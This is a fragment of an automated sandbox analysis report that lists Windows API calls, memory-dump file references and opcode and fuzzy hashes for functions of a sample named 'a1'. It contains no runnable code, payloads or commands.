                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1807457897-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1cc624085e2eb6d1fa09b23346882cb611e1acad4acabf4cf51e02d5bb76bf47
                                                                                                                                                                                                                                                                          • Instruction ID: 470fecbb711a046aa97df1e654c51e6061d63f55116dbf0ef4945f83f40227d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cc624085e2eb6d1fa09b23346882cb611e1acad4acabf4cf51e02d5bb76bf47
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC516B7150424C9ADB238F28CC84FE67BBCEB57304F3485EAD59AC7186C2349D46CB20
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002BAF90: __Init_thread_footer.LIBCMT ref: 002BB006
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002BAE00
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 984842325-0
                                                                                                                                                                                                                                                                          • Opcode ID: c18938fb7797e046d2738bbb1b2d0d7e0b9a663c3962d018412d48105456368c
                                                                                                                                                                                                                                                                          • Instruction ID: f7b734824bb4bf1b4356bd6ecaa945df190ac1646ca4fe16a374e1660dd270c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c18938fb7797e046d2738bbb1b2d0d7e0b9a663c3962d018412d48105456368c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31A0B1914744AFE720EF14EC82B99B3E8FB04766F240239E8114B7D2D7B5E914CB89
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,002D9708,?,00000000,00000000,?,?), ref: 002F437D
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9AE0: RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                            • Part of subcall function 002F4450: WaitForSingleObject.KERNEL32(?,000000FF,DF534560,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 002F4484
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateCreateFileHeapObjectSingleWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1261966429-0
                                                                                                                                                                                                                                                                          • Opcode ID: 98a0f09d368c33f353793959477e4a83c9dc02b193eba3aa5dfdb215fc590130
                                                                                                                                                                                                                                                                          • Instruction ID: d11a01347618eafee299c83d1044f9b7ca0f894d15b2b91da973224544aac78c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98a0f09d368c33f353793959477e4a83c9dc02b193eba3aa5dfdb215fc590130
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D31F434214B119FD324DF28D888B2BF7E0FF88704F20896DE69AA7360D771A951CB55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0029C932
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2296764815-0
                                                                                                                                                                                                                                                                          • Opcode ID: d214c810def3f9ada650be286f7d7a981ea6c6935d97e2d90613986c70abf71b
                                                                                                                                                                                                                                                                          • Instruction ID: 6c408d8e3c92af64fdacea56de79aaa13806cfb64fd85e8400b8c12998689aae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d214c810def3f9ada650be286f7d7a981ea6c6935d97e2d90613986c70abf71b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9801D8B1904704DBCB11CF68D842B59B3E4E708721F50427AFC16977D1D735A900CA45
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                            • Part of subcall function 002BB030: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 002BB09E
                                                                                                                                                                                                                                                                            • Part of subcall function 002BB030: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 002BB0E5
                                                                                                                                                                                                                                                                            • Part of subcall function 002BB030: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 002BB104
                                                                                                                                                                                                                                                                            • Part of subcall function 002BB030: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 002BB1A8
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002BB006
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$QueryValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 228406220-0
                                                                                                                                                                                                                                                                          • Opcode ID: 83ec2495856d532062929d7860f5b56285fcab5d2846a1428bf773e6be173e2e
                                                                                                                                                                                                                                                                          • Instruction ID: 07f82f0075070265670e0832728bf6ca53f394091e7dd249d08d9462b4a4f5c3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83ec2495856d532062929d7860f5b56285fcab5d2846a1428bf773e6be173e2e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03012671A44608EBC311EF58CD42B9A77E4E748B21F10433AF8319B7C2D779A9008B85
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0034B0DB: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,-00000010,?,00000008,DF534560), ref: 0034B13B
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateExceptionHeapRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3789339297-0
                                                                                                                                                                                                                                                                          • Opcode ID: a5f505b0dee8916fa22f8ce53a4c8e9610ecda0317835584aa9c897b08226a6a
                                                                                                                                                                                                                                                                          • Instruction ID: 9285d89eb2766e28884adddb511918e4c669f284d5e1705486e352786a25cc53
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f505b0dee8916fa22f8ce53a4c8e9610ecda0317835584aa9c897b08226a6a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF08235644248BBC701CF54DC01F5ABBA8FB08B50F108529F91996A90D735A9109B44
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00369290,?,?,00369290,00000220,?,?,?), ref: 00361769
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7fd30b7f604787243034e9ae8ca9e883f8b59048fdd224a85e88beeed1254010
                                                                                                                                                                                                                                                                          • Instruction ID: b9190f10353f113874f9eb7eb36116c9c9c7edb7f2d34ee78feb4c539db5c4fa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd30b7f604787243034e9ae8ca9e883f8b59048fdd224a85e88beeed1254010
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EE092325102356BEB233B75AD09B5B364DAF417E2F1E8120FC45DA499EB60EC0082E5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,AA831995,?,Function_0006C150,000000FF), ref: 6A547B6F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7e8bc90ca0625de39e08c321f6686ae689c0c02f260803a521b68361fe0a960e
                                                                                                                                                                                                                                                                          • Instruction ID: 571e188d4e81717fcc1f33a2441be73c80c23e7be728bf1bdf53bcd162ff127a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8bc90ca0625de39e08c321f6686ae689c0c02f260803a521b68361fe0a960e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E09271644548FFC701CF54CC40F56BBF8F709B10F00826AF915D3780DB35A8008A90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 431132790-0
                                                                                                                                                                                                                                                                          • Opcode ID: 51388a608af750e6ec3b746c4b2557529f18d8af9b8df78861a8193f458576a3
                                                                                                                                                                                                                                                                          • Instruction ID: 04a400e3efbbac26d0d207476f4077cca5c3388d5cb83e921166a1caed5fd60b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51388a608af750e6ec3b746c4b2557529f18d8af9b8df78861a8193f458576a3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E075B6C0120DAADB11CFE4C449BEFBBF8AB44314F514426D245E6181EB789745CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5bdc15e4772eea87ccb0fd809e0eb6202741beddf24f2da53a78ee441bd9d69a
                                                                                                                                                                                                                                                                          • Instruction ID: a06259fbdf9bb340a95f39ce170a4638efd7e3e9d1daa778e1b66a5a23cb7909
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bdc15e4772eea87ccb0fd809e0eb6202741beddf24f2da53a78ee441bd9d69a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE0EC31901A366B9A335A66C906B5B7B78AE40B61B0B8110BC44AF159CA60EC00C6E2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 431132790-0
                                                                                                                                                                                                                                                                          • Opcode ID: a095429cd9a1a2a519bbe8a99bf41be4aea9cc9ccc4654bd8563d24f2e123013
                                                                                                                                                                                                                                                                          • Instruction ID: 4357e4f739b215c2d293b4b387217ad814479b91855591de43c5226c88c6844c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a095429cd9a1a2a519bbe8a99bf41be4aea9cc9ccc4654bd8563d24f2e123013
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E07576C0120E9ADB01DFD4C556FEFB7F8AB04300F50446AA205EA141EA7457858BA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 001B872B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1ec8f1bf439f5dd652dc2ecadc77982944ca750996f9043b8eebc5ee022d1237
